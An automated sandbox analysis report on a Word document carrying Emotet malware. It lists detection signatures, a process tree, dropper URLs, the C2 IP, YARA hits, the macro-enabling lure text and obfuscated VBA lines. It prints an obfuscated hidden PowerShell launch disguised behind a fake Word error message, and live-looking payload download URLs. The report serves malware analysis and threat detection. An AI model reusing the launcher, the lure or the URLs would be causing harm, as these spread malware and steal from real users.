
Analysis Report bestand-8881014518 00944.doc

Overview

General Information

Sample Name: bestand-8881014518 00944.doc
Analysis ID: 336501
MD5: 8ce4185f17ed35f43462f2f44c1cfc3d
SHA1: 9c6396150dd23a65c36e84af69e15543cedca4d2
SHA256: 4425de724449dedb3b183a3bfd567f9d3449c2457a1e2fd695019b1b6227e035

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2308 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2288 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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 MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2452 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 1100 cmdline: POwersheLL -w hidden -ENCOD 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 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2312 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2556 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2500 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vpdqbmffwwlyu\elrrcydsvvol.uui',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2676 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ygrfxgybds\jrwpxihfr.rob',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2828 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lydzwviczteg\jfrrzuskryo.byz',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2724 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wmhtpvmxcctn\ytalpvmidll.mdf',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2800 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Grdxtrtyl\kmtzbbgl.dxh',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2384 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wgsitvbdu\kifteejg.dsr',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2960 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Extnaatd\rvydpsb.zwq',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 2948 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rvuszsgopfi\mtjvkbmtlk.dym',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 2252 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oqhzdezq\bectafh.dff',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                            • rundll32.exe (PID: 1748 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Weiwdqzj\qfklela.qlk',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                              • rundll32.exe (PID: 1900 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vvjepckhx\flnsfzgm.bdf',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                • rundll32.exe (PID: 3000 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ikstsciju\uxbijfvp.mja',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000009.00000002.2098442031.00000000003A1000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000012.00000002.2346389267.00000000003D1000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000007.00000002.2095140776.0000000000240000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
0000000F.00000002.2108654595.00000000020A1000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
0000000A.00000002.2099597236.00000000001B0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
(21 entries in total; the first five are shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
13.2.rundll32.exe.240000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
9.2.rundll32.exe.2f0000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
11.2.rundll32.exe.3a0000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
16.2.rundll32.exe.230000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
14.2.rundll32.exe.1b0000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
(31 entries in total; the first five are shown)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: https://fnjbq.com/wp-includes/rlR/ | Avira URL Cloud: Label: malware
Source: http://wap.zhonglisc.com/wp-includes/QryCB/ | Avira URL Cloud: Label: malware
Source: http://petafilm.com/wp-admin/4m/ | Avira URL Cloud: Label: malware
Source: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/ | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: petafilm.com | Virustotal: Detection: 6%
Source: http://petafilm.com | Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: bestand-8881014518 00944.doc | Virustotal: Detection: 31%
Source: bestand-8881014518 00944.doc | ReversingLabs: Detection: 47%
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global traffic | DNS query: name: petafilm.com
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 176.53.69.151:80

Networking:

Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp | String found in memory: http://petafilm.com/wp-admin/4m/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp | String found in memory: http://givingthanksdaily.com/qlE/VeF/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp | String found in memory: http://wap.zhonglisc.com/wp-includes/QryCB/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp | String found in memory: https://fnjbq.com/wp-includes/rlR/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp | String found in memory: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp | String found in memory: http://zieflix.teleskopstore.com/cgi-bin/Gt3S/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp | String found in memory: https://somanap.com/wp-admin/P/
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 200 OK
    Cache-Control: no-cache, must-revalidate
    Pragma: no-cache
    Content-Type: application/octet-stream
    Expires: Wed, 06 Jan 2021 07:53:49 GMT
    Last-Modified: Wed, 06 Jan 2021 07:53:49 GMT
    Server: Microsoft-IIS/10.0
    Set-Cookie: 5ff56c8d1a339=1609919629; expires=Wed, 06-Jan-2021 07:54:49 GMT; Max-Age=60; path=/
    Content-Disposition: attachment; filename="bLH.dll"
    Content-Transfer-Encoding: binary
    X-Powered-By: ASP.NET
    X-Powered-By-Plesk: PleskWin
    Date: Wed, 06 Jan 2021 07:53:48 GMT
    Content-Length: 192000
    Data Ascii: MZ@
Source: global traffic | HTTP traffic detected:
    GET /wp-admin/4m/ HTTP/1.1
    Host: petafilm.com
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 176.53.69.151 176.53.69.151
Source: Joe Sandbox View | ASN Name: RADORETR RADORETR
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1BCD43F3-025D-4403-9DBE-B492A11253DC}.tmp
Source: rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: petafilm.com
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp | String found in binary or memory: http://givingthanksdaily.com/qlE/VeF/
Source: rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2102033680.0000000003A65000.00000004.00000001.sdmp | String found in binary or memory: http://petafilm.com
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp | String found in binary or memory: http://petafilm.com/wp-admin/4m/
Source: powershell.exe, 00000005.00000002.2094280611.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099067500.00000000027A0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp | String found in binary or memory: http://wap.zhonglisc.com/wp-includes/QryCB/
Source: rundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2094280611.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099067500.00000000027A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000008.00000002.2097194758.0000000001D20000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp | String found in binary or memory: http://zieflix.teleskopstore.com/cgi-bin/Gt3S/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp | String found in binary or memory: https://fnjbq.com/wp-includes/rlR/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp | String found in binary or memory: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp | String found in binary or memory: https://somanap.com/wp-admin/P/

E-Banking Fraud:

Yara detected Emotet
Source: Yara match | File source: 00000009.00000002.2098442031.00000000003A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2346389267.00000000003D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2095140776.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2108654595.00000000020A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2099597236.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2095230919.0000000000261000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.2107302523.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2096491142.0000000000241000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2104856163.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2346371672.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2101735840.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2101060119.0000000000401000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2101000772.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.2107439959.0000000000231000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2101688824.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2108653259.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2103856048.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2099670858.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2098319985.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2106854955.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2108749500.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2104985518.0000000000261000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2096383511.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2103936335.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 13.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.rundll32.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rundll32.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.rundll32.exe.3b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.rundll32.exe.3d0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.rundll32.exe.3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.rundll32.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.rundll32.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rundll32.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rundll32.exe.20a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I , Word
                      Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
                      Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I , Words:3 N@m 13 ;a 10096 G
                      Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a
                      Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Screenshot number: 8Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Document contains an embedded VBA macro with suspicious strings
                      Source: bestand-8881014518 00944.doc | OLE, VBA macro line: Set VJbwzTDT = ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")
                      Source: bestand-8881014518 00944.doc | OLE, VBA macro line: Set JhiYfXc = HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC")
                      Source: bestand-8881014518 00944.doc | OLE, VBA macro line: Set DRrKpoA = xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp")
                      Source: bestand-8881014518 00944.doc | OLE, VBA macro line: Set AybxtEBCJ = bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH")
                      Source: bestand-8881014518 00944.doc | OLE, VBA macro line: Set uJSEDH = dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII")
                      Source: bestand-8881014518 00944.doc | OLE, VBA macro line: Set tcYiEMeRH = RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC")
                      Source: bestand-8881014518 00944.doc | OLE, VBA macro line: Set gQxBD = PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG")
                      Source: bestand-8881014518 00944.doc | OLE, VBA macro line: Set RkPWCDPC = xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG")
                      Source: bestand-8881014518 00944.doc | OLE, VBA macro line: Set JADCpjk = rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ")
                      Source: bestand-8881014518 00944.doc | OLE, VBA macro line: Set eUdbDAHHs = DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE")
                      Source: bestand-8881014518 00944.doc | OLE, VBA macro line: Set njKwJdA = XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ")
                      Source: bestand-8881014518 00944.doc | OLE, VBA macro line: Set PmBxcD = rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA")
                      Source: bestand-8881014518 00944.doc | OLE, VBA macro line: Set oOysMtDG = xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE")
                      Source: bestand-8881014518 00944.doc | OLE, VBA macro line: Set hiZkEEF = hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA")
                      Source: bestand-8881014518 00944.doc | OLE, VBA macro line: Set UPhhYZEF = lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP")
                      Source: bestand-8881014518 00944.doc | OLE, VBA macro line: Set bPFNuJ = VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE")
                      Source: bestand-8881014518 00944.doc | OLE, VBA macro line: Set OBwIBy = QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj")
                      Source: bestand-8881014518 00944.doc | OLE, VBA macro line: Set EUMDPGt = UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")
                      Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set VJbwzTDT = ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")
                      Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set JhiYfXc = HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC")
                      Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set DRrKpoA = xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp")
                      Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set AybxtEBCJ = bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH")
                      Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set uJSEDH = dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII")
